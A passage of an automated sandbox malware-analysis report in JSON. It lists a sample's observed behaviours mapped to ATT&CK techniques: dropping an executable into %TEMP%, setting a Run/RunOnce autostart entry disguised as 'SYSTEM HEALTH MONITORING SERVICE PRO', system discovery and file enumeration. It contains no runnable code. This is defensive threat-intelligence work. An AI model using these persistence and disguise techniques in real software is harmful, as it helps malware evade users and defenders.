"\"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"91C379A9DD3E5BB79D42675D0E101E7D4EE390384FB431D61F61C8C2868E2EB5\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"CATEGORY\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"NAME\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"PARENTFOLDER\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"DESCRIPTION\"; Value: \"\")\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"RELATIVEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00004920]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480748'}\" (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480732'}\" (UID: 00000000-00003412)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \".bss\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" queries volume information of \"C:\\\" at 00000000-00004572-0000010C-158798\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00003412-0000010C-1328100\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00004920-0000010C-1288863", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"085cda53603755dc.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003412)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" queries volume information of \"C:\\\" at 00000000-00004572-0000010C-158798\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00003412-0000010C-1328100\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00004920-0000010C-1288863", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006900105b69000b5b6900000000000000000000006600000000019cdd22000000000000eb220095e13877376d6400feffffff435c3c7750593c77aa000000b80000000a5b6900085b690024df22005ce3220000000000000000000000000000000000000000000000000000000000000000001c5c3b7760d85475ffffffff17000000d4de22002400000003000000c4e32200f0e822005ce322008600000000df220096ed3c77325b6900a06a12758600000024df22005ce322000000000086008800a06a127524df2200916c1275325b6900a06a1275a06a127594e3220002020000 (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004572)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003000c8523000c3523000000000000000000000002d00000000019cdc22000000000000ea220095e1387746926500feffffff435c3c7750593c77aa000000b8000000c2523000c052300024de22005ce2220000000000000000000000000000000000000000000000000000000000000000001c5c3b7760d85475ffffffff17000000d4dd22002400000003000000c4e22200f0e722005ce222008600000000de220096ed3c77ea523000a06a12758600000024de22005ce222000000000086008800a06a127524de2200916c1275ea523000a06a1275a06a127594e2220002020000 (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dcf5220000000000700000002cf62200feffffffb4f52200cf003d77d6003d77da757b7770000000380000002cf622000000000088f5220000000000f0f52200 (UID: 00000000-00003412)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004920)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"085cda53603755dc.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00003412)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\*.* (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"FindNextFileW\" with parameter 085cda53603755dc.exe (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"FindNextFileW\" with parameter 10D5CC3F-71C4-40D7-8173-E990C25C1412.Diagnose.Admin.0.etl (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"FindNextFileW\" with parameter 1df892bc-2ec3-4d0e-ac47-1eabbc40bce1.tmp (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"FindNextFileW\" with parameter 8578e504-fb9e-4973-8218-da2b499cb57d.tmp (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"FindNextFileW\" with parameter 99F9947D-30DB-4640-92C7-6BB2A24B05F1.Diagnose.Admin.0.etl (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"FindNextFileW\" with parameter a881a3c9-dc11-47c4-9cf5-94257bfac790.tmp (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"FindNextFileW\" with parameter AA7D7BE8-CE8F-4570-A39C-1992F0466AAE.Diagnose.Admin.0.etl (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"FindNextFileW\" with parameter AdobeARM.log (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"FindNextFileW\" with parameter AdobeARM_NotLocked.log (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"FindNextFileW\" with parameter AdobeSFX.log (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"FindNextFileW\" with parameter Adobe_ADMLogs (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00001.log (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00002.log (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"FindNextFileW\" with parameter c278146c-ed5a-46a3-b7ee-8da417122e54.tmp (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"FindNextFileW\" with parameter ccversion.tag (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"FindNextFileW\" with parameter chromesetup.msi (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"FindNextFileW\" with parameter chrome_installer.log (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"FindNextFileW\" with parameter CVR640E.tmp.cvr (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"FindNextFileW\" with parameter CVR78E9.tmp.cvr (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"FindNextFileW\" with parameter CVRC166.tmp.cvr (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"FindNextFileW\" with parameter CVRE8FB.tmp.cvr (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"FindNextFileW\" with parameter dat17FA.tmp (UID: 00000000-00004572)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" called \"FindNextFileW\" with parameter dat17FB.tmp (UID: 00000000-00004572)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-60", "relevance": 10, "name": "PE file contains unusual section name", "description": "\"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5\" has a section named \".eh_fram\"\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5\" has a section named \".CRT\"\n \"085cda53603755dc.exe\" has a section named \".eh_fram\"\n \"085cda53603755dc.exe\" has a section named \".CRT\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"system\" (Source: 91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5, API is part of module: MSVCRT.DLL)\n Found string \"shutdown\" (Source: 91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5, API is part of module: WS2_32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-8", "relevance": 10, "name": "Sample translates to unusual binary language", "description": "Russian (ID: 0x0419)", "origin": "Static Parser"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" wrote 16136 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00004920]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5\" has section name .text with entropy \"6.12526528121\"\n \"085cda53603755dc.exe\" has section name .text with entropy \"6.12526528121\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"085cda53603755dc.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET 